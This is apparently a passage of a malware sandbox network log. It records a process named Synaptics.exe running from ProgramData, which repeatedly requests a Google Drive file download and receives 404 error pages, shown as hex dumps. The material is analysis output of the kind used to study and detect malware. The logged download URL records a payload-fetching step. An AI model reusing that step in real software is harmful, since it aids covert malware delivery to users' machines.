                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      87192.168.2.650031142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:03 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-bZaqENI9DTyTjMUKYKOS8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      88192.168.2.650032142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:03 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6Mi8Z2l1YdcIjnX8j4rJh4LUozlRBqHu7UJFv4feoTXHiRlGYqs7xfvmQ1VjfChrtRYRmjN7I
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-47A-ybEfCOelnalS-LI6cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:03 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:41:03 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 47 62 4a 58 43 48 38 78 35 70 2d 73 31 74 63 54 4d 70 31 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="oGbJXCH8x5p-s1tcTMp1ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:41:03 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      89192.168.2.650033142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:03 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-7QW3zjkCkYM5SvLmvbW4fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      90192.168.2.650034142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:03 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:03 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5WRgAoBA_Yst7XzWoKn8EIbZ8lxMfHpPIJc34E0fCpHissx0pU23vKgWIOlX-My7uP
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:03 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-dyfSp9yr1pF0duvKQtgy_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:03 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:03 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 51 50 56 51 4f 45 56 6f 38 76 4b 56 39 47 6b 79 44 6f 70 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="cQPVQOEVo8vKV9GkyDop0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:03 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      91192.168.2.650045142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:04 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-TFle4yNkifLY1ASnvtIweQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      92192.168.2.650048142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5s8vuHhHslu7LgAC0HtCgROm2ZfMqK934S3PxNN8JKkGHXoGEkwM5nh-2bJpzp0uD-
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SQhGkBFRkkWbegD8wMV8SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:05 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:05 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 73 5a 53 48 62 73 6e 32 55 74 36 4d 4e 34 67 4c 41 36 58 43 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="KsZSHbsn2Ut6MN4gLA6XCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:05 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      93192.168.2.650047142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:41:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC55mzfMvGiXsTDOWC66KV_2Pn1lCS4KMAuWNZWC4l2JgP6g-N-225GhSgJfJq2z0fs-jDJkYdg
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-90saIUCqHa3RaD2Jl8l3kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:05 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
